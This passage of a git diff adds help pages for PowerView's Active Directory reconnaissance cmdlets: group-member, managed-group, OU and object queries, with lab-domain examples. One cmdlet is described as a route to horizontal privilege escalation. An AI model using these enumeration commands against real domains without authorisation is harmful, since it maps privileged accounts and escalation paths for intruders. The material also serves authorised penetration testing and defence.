-LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Group + +Custom PSObject with translated group property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md new file mode 100755 index 0000000..5381b2c --- /dev/null +++ b/docs/Recon/Get-DomainGroupMember.md @@ -0,0 +1,401 @@ +# Get-DomainGroupMember + +## SYNOPSIS +Return the members of a specific domain group. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID + +## SYNTAX + +### None (Default) +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-LDAPFilter ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] + [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +### ManualRecurse +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-Recurse] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +### RecurseUsingMatchingRule +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-RecurseUsingMatchingRule] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for the specified +group matching the criteria. +Each result is then rebound and the full user +or group object is returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGroupMember "Desktop Admins" +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'Desktop Admins' | Get-DomainGroupMember -Recurse +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Testing Group +GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember +``` + +### -------------------------- EXAMPLE 5 -------------------------- +``` +'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember +``` + +### -------------------------- EXAMPLE 6 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins' + +### -------------------------- EXAMPLE 7 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'dev\domain admins' | Get-DomainGroupMember -Verbose +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins))) +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local))) + +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : user1 +MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108 + +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local))) +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : Administrator +MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-500 + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Recurse +Switch. +If the group member is a group, recursively try to query its members as well. + +```yaml +Type: SwitchParameter +Parameter Sets: ManualRecurse +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RecurseUsingMatchingRule +Switch. +Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse. +Much faster than manual recursion, but doesn't reveal cross-domain groups, +and only returns user accounts (no nested group objects themselves). + +```yaml +Type: SwitchParameter +Parameter Sets: RecurseUsingMatchingRule +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GroupMember + +Custom PSObject with translated group member property fields. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/) + diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md new file mode 100755 index 0000000..13d48a2 --- /dev/null +++ b/docs/Recon/Get-DomainManagedSecurityGroup.md @@ -0,0 +1,177 @@ +# Get-DomainManagedSecurityGroup + +## SYNOPSIS +Returns all security groups in the current (or target) domain that have a manager set. + +Author: Stuart Morgan (@ukstufus) \, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl + +## SYNTAX + +``` +Get-DomainManagedSecurityGroup [[-Domain] ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Authority to manipulate the group membership of AD security groups and distribution groups +can be delegated to non-administrators by setting the 'managedBy' attribute. +This is typically +used to delegate management authority to distribution groups, but Windows supports security groups +being managed in the same way. + +This function searches for AD groups which have a group manager set, and determines whether that +user can manipulate group membership. +This could be a useful method of horizontal privilege +escalation, especially if the manager can manipulate the membership of a privileged group. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv +``` + +Store a list of all security groups with managers in group-managers.csv + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ManagedSecurityGroup + +A custom PSObject describing the managed security group. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md new file mode 100755 index 0000000..cc1fd39 --- /dev/null +++ b/docs/Recon/Get-DomainOU.md @@ -0,0 +1,316 @@ +# Get-DomainOU + +## SYNOPSIS +Search for all organization units (OUs) or specific OU objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainOU [[-Identity] ] [-GPLink ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all OU objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainOU +``` + +Returns the current OUs in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainOU *admin* -Domain testlab.local +``` + +Returns all OUs with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all OUs with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +"*admin*","*server*" | Get-DomainOU +``` + +Search for OUs with the specific names. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainOU -Credential $Cred + +## PARAMETERS + +### -Identity +An OU name (e.g. +TestOU), DistinguishedName (e.g. +OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. +8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GPLink +Only return OUs with the specified GUID in their gplink property. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GUID + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.OU + +Custom PSObject with translated OU property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md new file mode 100755 index 0000000..f900c53 --- /dev/null +++ b/docs/Recon/Get-DomainObject.md @@ -0,0 +1,318 @@ +# Get-DomainObject + +## SYNOPSIS +Return all (or specified) domain objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName + +## SYNTAX + +``` +Get-DomainObject [[-Identity] ] [-Domain ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] [-Credential ] + [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainObject -Domain testlab.local +``` + +Return all objects for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname +``` + +distinguishedname +----------------- +CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local +CN=dfm,CN=Users,DC=testlab,DC=local +OU=OU3,DC=testlab,DC=local +CN=dfm (admin),CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObject -Credential $Cred -Identity 'windows1' + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) + +distinguishedname +----------------- +CN=harmj0y,CN=Users,DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins))) +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ADObject + +Custom PSObject with translated AD object property fields. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md new file mode 100755 index 0000000..97f70cd --- /dev/null +++ b/docs/Recon/Get-DomainObjectAcl.md @@ -0,0 +1,251 @@ +# Get-DomainObjectAcl + +## SYNOPSIS 